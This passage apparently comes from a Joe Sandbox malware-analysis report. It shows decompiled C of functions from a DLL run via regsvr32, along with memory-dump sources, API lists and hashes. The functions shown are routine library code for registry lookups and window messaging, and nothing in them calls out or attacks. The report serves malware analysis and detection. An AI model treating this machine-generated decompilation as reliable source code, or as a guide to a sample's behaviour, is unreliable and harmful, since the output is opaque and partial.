						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E1001729E(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E1002EF82(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E10022A6E();
				}
				_t59 = _t98;
				goto L22;
			}
















                                                                                                                0x100311c4
                                                                                                                0x100311c4
                                                                                                                0x100311cb
                                                                                                                0x100311d9
                                                                                                                0x100311e2
                                                                                                                0x100311ef
                                                                                                                0x100311f2
                                                                                                                0x10031319
                                                                                                                0x10031319
                                                                                                                0x1003131d
                                                                                                                0x10031320
                                                                                                                0x10031322
                                                                                                                0x10031325
                                                                                                                0x10031326
                                                                                                                0x10031326
                                                                                                                0x1003132b
                                                                                                                0x1003132b
                                                                                                                0x1003132d
                                                                                                                0x10031332
                                                                                                                0x10031332
                                                                                                                0x100311fe
                                                                                                                0x1003124b
                                                                                                                0x1003124e
                                                                                                                0x10031254
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003125a
                                                                                                                0x10031261
                                                                                                                0x10031267
                                                                                                                0x1003126c
                                                                                                                0x1003126e
                                                                                                                0x10031271
                                                                                                                0x10031274
                                                                                                                0x10031276
                                                                                                                0x1003127d
                                                                                                                0x10031289
                                                                                                                0x1003128b
                                                                                                                0x1003128d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003129a
                                                                                                                0x100312a6
                                                                                                                0x100312ab
                                                                                                                0x100312b0
                                                                                                                0x100312b3
                                                                                                                0x100312b5
                                                                                                                0x100312b8
                                                                                                                0x100312ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100312d7
                                                                                                                0x100312da
                                                                                                                0x100312dd
                                                                                                                0x100312e3
                                                                                                                0x100312e6
                                                                                                                0x100312eb
                                                                                                                0x100312eb
                                                                                                                0x100312ed
                                                                                                                0x100312f0
                                                                                                                0x100312f5
                                                                                                                0x100312f5
                                                                                                                0x100312f7
                                                                                                                0x100312fa
                                                                                                                0x100312ff
                                                                                                                0x100312ff
                                                                                                                0x10031301
                                                                                                                0x10031307
                                                                                                                0x1003130a
                                                                                                                0x1003130d
                                                                                                                0x1003130f
                                                                                                                0x1003130f
                                                                                                                0x00000000
                                                                                                                0x1003130d
                                                                                                                0x10031278
                                                                                                                0x10031278
                                                                                                                0x00000000
                                                                                                                0x10031278
                                                                                                                0x10031203
                                                                                                                0x1003120c
                                                                                                                0x10031213
                                                                                                                0x10031216
                                                                                                                0x10031219
                                                                                                                0x1003121c
                                                                                                                0x1003121f
                                                                                                                0x10031222
                                                                                                                0x10031225
                                                                                                                0x1003122d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003122f
                                                                                                                0x10031236
                                                                                                                0x10031239
                                                                                                                0x1003123b
                                                                                                                0x1003123e
                                                                                                                0x1003123f
                                                                                                                0x1003123f
                                                                                                                0x10031244
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                • String ID:
                                                                                                                • API String ID: 3574576181-0
                                                                                                                • Opcode ID: 8e800c516fb9f534f7ddac136c4b36199b3b4c6ba972024304678830e82c39ba
                                                                                                                • Instruction ID: 81cc15f29fc27522e7acf18e4fe3af452782b3e5e45194abce79f82709f6e1eb
                                                                                                                • Opcode Fuzzy Hash: 8e800c516fb9f534f7ddac136c4b36199b3b4c6ba972024304678830e82c39ba
                                                                                                                • Instruction Fuzzy Hash: 57415871900229EFCF02DFA0C8859DEBBB9FF08B55F10851AF119AB191CB70AA51CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002602B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E1002602B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x1006dbdc; // 0xdf7c0cda
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E1003D1E6(E10053B04, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E10025EF8(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E10025F09();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E1003B437(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					 *((intOrPtr*)(_t100 + 0x68)) =  *((intOrPtr*)(_t100 + 0x68)) != 0;
					if( *((intOrPtr*)(_t100 + 0x68)) != 0) {
						E10005030(_t95, _t104, "Software\\");
						_v4 = 0;
						E10003520(0,  *(_t100 + 0x54));
						_t54 = E10002170( &_v36,  &_v16, 0x100585c4);
						_v4 = 1;
						E10002170( &_v24, _t54,  *((intOrPtr*)(_t100 + 0x68)));
						_v4 = 3;
						E10001020(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E10025F1C(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E10025F1C(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10001020( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10001020( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x1006c938;
						E1003D2F0( &_v280, 0x1006522c);
						asm("int3");
						_push(4);
						E1003D1E6(E10052A8D, _t79, 0, _t100);
						_t94 = E1002D12C(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E10022AE3(_t94);
						}
						return E1003D2BE(_t77);
					}
				}
			}




























                                                                                                                0x1002602b
                                                                                                                0x1002602b
                                                                                                                0x1002602b
                                                                                                                0x10026032
                                                                                                                0x10026036
                                                                                                                0x1002603d
                                                                                                                0x10026043
                                                                                                                0x1002604a
                                                                                                                0x10026051
                                                                                                                0x10026053
                                                                                                                0x10026056
                                                                                                                0x10026059
                                                                                                                0x10026060
                                                                                                                0x10026063
                                                                                                                0x10026065
                                                                                                                0x10026065
                                                                                                                0x10026068
                                                                                                                0x10026069
                                                                                                                0x1002606b
                                                                                                                0x10026070
                                                                                                                0x10026072
                                                                                                                0x10026074
                                                                                                                0x1002607b
                                                                                                                0x1002607d
                                                                                                                0x1002607d
                                                                                                                0x10026080
                                                                                                                0x10026080
                                                                                                                0x10026065
                                                                                                                0x10026085
                                                                                                                0x10026088
                                                                                                                0x10026165
                                                                                                                0x1002616b
                                                                                                                0x10026173
                                                                                                                0x10026174
                                                                                                                0x10026175
                                                                                                                0x1002617e
                                                                                                                0x10026183
                                                                                                                0x1002618a
                                                                                                                0x1002608e
                                                                                                                0x10026096
                                                                                                                0x10026098
                                                                                                                0x100260a7
                                                                                                                0x100260b2
                                                                                                                0x100260b5
                                                                                                                0x100260c7
                                                                                                                0x100260cf
                                                                                                                0x100260d8
                                                                                                                0x100260e6
                                                                                                                0x100260ea
                                                                                                                0x100260f2
                                                                                                                0x100260f8
                                                                                                                0x100260f9
                                                                                                                0x10026106
                                                                                                                0x1002610c
                                                                                                                0x1002610e
                                                                                                                0x10026123
                                                                                                                0x10026128
                                                                                                                0x1002612d
                                                                                                                0x1002612e
                                                                                                                0x1002612f
                                                                                                                0x1002612f
                                                                                                                0x10026137
                                                                                                                0x10026137
                                                                                                                0x10026149
                                                                                                                0x10026155
                                                                                                                0x1002615d
                                                                                                                0x10026160
                                                                                                                0x00000000
                                                                                                                0x1002609a
                                                                                                                0x1001729e
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6
                                                                                                                0x10026098

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002604A
                                                                                                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 10026106
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1002611D
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10026137
                                                                                                                • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 10026149
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                • String ID: Software\
                                                                                                                • API String ID: 3878845136-964853688
                                                                                                                • Opcode ID: fe00129859251c3057611a56493832f551f6470be96c541d126e5d60e74498ad
                                                                                                                • Instruction ID: df4787835faf45ff6cc6f620844819c68e58f9b63de8fd5c41c71a224e8fd913
                                                                                                                • Opcode Fuzzy Hash: fe00129859251c3057611a56493832f551f6470be96c541d126e5d60e74498ad
                                                                                                                • Instruction Fuzzy Hash: DB41EF31900259AFDB11DBA4DC81EFFB7B9EF48310F50052AF552E3291DB34AA44CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100197B9 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E100197B9(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E1001D23C(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E1002320F(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E10023728(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E1001D35E(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E100235C0(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E10025696();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E1001D35E(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}






















                                                                                                                0x100197b9
                                                                                                                0x100197c2
                                                                                                                0x100197ca
                                                                                                                0x100197cc
                                                                                                                0x100197d0
                                                                                                                0x100197d4
                                                                                                                0x100197e2
                                                                                                                0x100197e2
                                                                                                                0x100197e7
                                                                                                                0x100197ed
                                                                                                                0x100197f1
                                                                                                                0x100197f5
                                                                                                                0x100197fa
                                                                                                                0x10019800
                                                                                                                0x10019878
                                                                                                                0x10019878
                                                                                                                0x10019878
                                                                                                                0x1001987c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019814
                                                                                                                0x10019816
                                                                                                                0x1001987e
                                                                                                                0x1001987e
                                                                                                                0x1001987e
                                                                                                                0x10019885
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019889
                                                                                                                0x1001988f
                                                                                                                0x10019897
                                                                                                                0x100198a4
                                                                                                                0x100198ac
                                                                                                                0x100198ae
                                                                                                                0x100198ae
                                                                                                                0x10019897
                                                                                                                0x100198b2
                                                                                                                0x100198b4
                                                                                                                0x100198ba
                                                                                                                0x100198bc
                                                                                                                0x100198f7
                                                                                                                0x100198f7
                                                                                                                0x100198f7
                                                                                                                0x00000000
                                                                                                                0x100198be
                                                                                                                0x100198c2
                                                                                                                0x100198c9
                                                                                                                0x100198ca
                                                                                                                0x100198cc
                                                                                                                0x100198d4
                                                                                                                0x100198d4
                                                                                                                0x100198e8
                                                                                                                0x00000000
                                                                                                                0x100198ea
                                                                                                                0x00000000
                                                                                                                0x100198ea
                                                                                                                0x100198e8
                                                                                                                0x100198bc
                                                                                                                0x100198ec
                                                                                                                0x100198ed
                                                                                                                0x00000000
                                                                                                                0x100198f2
                                                                                                                0x10019818
                                                                                                                0x1001981a
                                                                                                                0x1001981e
                                                                                                                0x10019820
                                                                                                                0x10019828
                                                                                                                0x1001982a
                                                                                                                0x1001982a
                                                                                                                0x1001982a
                                                                                                                0x1001982c
                                                                                                                0x10019831
                                                                                                                0x10019833
                                                                                                                0x10019837
                                                                                                                0x10019839
                                                                                                                0x1001983d
                                                                                                                0x1001984c
                                                                                                                0x1001984c
                                                                                                                0x1001983d
                                                                                                                0x10019837
                                                                                                                0x10019852
                                                                                                                0x10019857
                                                                                                                0x10019874
                                                                                                                0x10019874
                                                                                                                0x00000000
                                                                                                                0x10019859
                                                                                                                0x10019866
                                                                                                                0x1001986c
                                                                                                                0x10019870
                                                                                                                0x10019872
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019872
                                                                                                                0x10019857
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 100197E7
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001980E
                                                                                                                • UpdateWindow.USER32 ref: 10019828
                                                                                                                • SendMessageA.USER32 ref: 1001984C
                                                                                                                • SendMessageA.USER32 ref: 10019866
                                                                                                                • UpdateWindow.USER32 ref: 100198AC
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100198E0
                                                                                                                  • Part of subcall function 1001D23C: GetWindowLongA.USER32(?,000000F0), ref: 1001D247
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 2853195852-0
                                                                                                                • Opcode ID: 6e53de550b6b7c23bc77ca9b403ca520573940f5afa320a098b54db7afd03077
                                                                                                                • Instruction ID: 4b2ea10294a732189e16f04b93a982dac3e7738e79e70afb51cbaa69b3d0715c
                                                                                                                • Opcode Fuzzy Hash: 6e53de550b6b7c23bc77ca9b403ca520573940f5afa320a098b54db7afd03077
                                                                                                                • Instruction Fuzzy Hash: 1941C2306087419BE721DF618C88A1BBBF4FFC6B94F100A2DF5819A0A1DB72D885CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025EB2 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10025EB2(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E10004700();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E10023187(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E1001B030(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E1001B030(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E1001B075(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E1001B030(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x1006c938;
						E1003D2F0( &_v28, 0x1006522c);
						asm("int3");
						_push(4);
						E1003D1E6(E10052A8D, _t37, _t46, _t51);
						_t43 = E1002D12C(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E10022AE3(_t43);
						}
						return E1003D2BE(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}
























                                                                                                                0x10025eb2
                                                                                                                0x10025eb2
                                                                                                                0x10025eb2
                                                                                                                0x10025eb7
                                                                                                                0x10025ed2
                                                                                                                0x10025ed4
                                                                                                                0x10025ed6
                                                                                                                0x10025ee1
                                                                                                                0x10025ee7
                                                                                                                0x10025ee9
                                                                                                                0x10025eeb
                                                                                                                0x10025eec
                                                                                                                0x10035872
                                                                                                                0x10035874
                                                                                                                0x10035877
                                                                                                                0x10035879
                                                                                                                0x1003589b
                                                                                                                0x00000000
                                                                                                                0x1003587b
                                                                                                                0x1003587b
                                                                                                                0x10035880
                                                                                                                0x10035882
                                                                                                                0x10035893
                                                                                                                0x10035893
                                                                                                                0x1003589a
                                                                                                                0x1003589a
                                                                                                                0x10025eee
                                                                                                                0x100357d3
                                                                                                                0x100357d3
                                                                                                                0x100357d4
                                                                                                                0x100357d5
                                                                                                                0x100357d6
                                                                                                                0x100357d7
                                                                                                                0x100357d8
                                                                                                                0x100357dc
                                                                                                                0x100357e2
                                                                                                                0x100357e8
                                                                                                                0x10035801
                                                                                                                0x10035801
                                                                                                                0x10035803
                                                                                                                0x10035805
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100357f5
                                                                                                                0x100357f7
                                                                                                                0x100357f9
                                                                                                                0x1003586b
                                                                                                                0x10035870
                                                                                                                0x100357fb
                                                                                                                0x100357fc
                                                                                                                0x00000000
                                                                                                                0x100357fc
                                                                                                                0x00000000
                                                                                                                0x100357f9
                                                                                                                0x10035807
                                                                                                                0x1003581f
                                                                                                                0x1003581f
                                                                                                                0x10035821
                                                                                                                0x10035823
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10035813
                                                                                                                0x10035815
                                                                                                                0x10035817
                                                                                                                0x00000000
                                                                                                                0x10035819
                                                                                                                0x1003581a
                                                                                                                0x00000000
                                                                                                                0x1003581a
                                                                                                                0x00000000
                                                                                                                0x10035817
                                                                                                                0x10035825
                                                                                                                0x10035829
                                                                                                                0x1003582e
                                                                                                                0x10035830
                                                                                                                0x1003583a
                                                                                                                0x10035851
                                                                                                                0x10035851
                                                                                                                0x10035853
                                                                                                                0x10035855
                                                                                                                0x10035856
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10035845
                                                                                                                0x10035847
                                                                                                                0x10035849
                                                                                                                0x1003584c
                                                                                                                0x00000000
                                                                                                                0x1003584c
                                                                                                                0x00000000
                                                                                                                0x10035849
                                                                                                                0x10035869
                                                                                                                0x00000000
                                                                                                                0x10035832
                                                                                                                0x00000000
                                                                                                                0x10035832
                                                                                                                0x10035830
                                                                                                                0x10025ed8
                                                                                                                0x1001729e
                                                                                                                0x1001729e
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6
                                                                                                                0x10025eb9
                                                                                                                0x10025eb9
                                                                                                                0x10025ebe
                                                                                                                0x00000000
                                                                                                                0x10025ec5
                                                                                                                0x10025ecb
                                                                                                                0x10025ecb
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 3219385341-0
                                                                                                                • Opcode ID: 125fe17d3a65532fd924afd3d79837bb38bfa8aadda630246eae324e1f7d9d47
                                                                                                                • Instruction ID: 8c0562f11bf6b8102d91fa625b09d924d8d0b98152d8301606d7d9821aad4bd6
                                                                                                                • Opcode Fuzzy Hash: 125fe17d3a65532fd924afd3d79837bb38bfa8aadda630246eae324e1f7d9d47
                                                                                                                • Instruction Fuzzy Hash: B9310275204216AFDA12DB24DC84E6F76EDEB496C7F220439F801EB160DF33DC4196A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10019D44 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10019D44(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
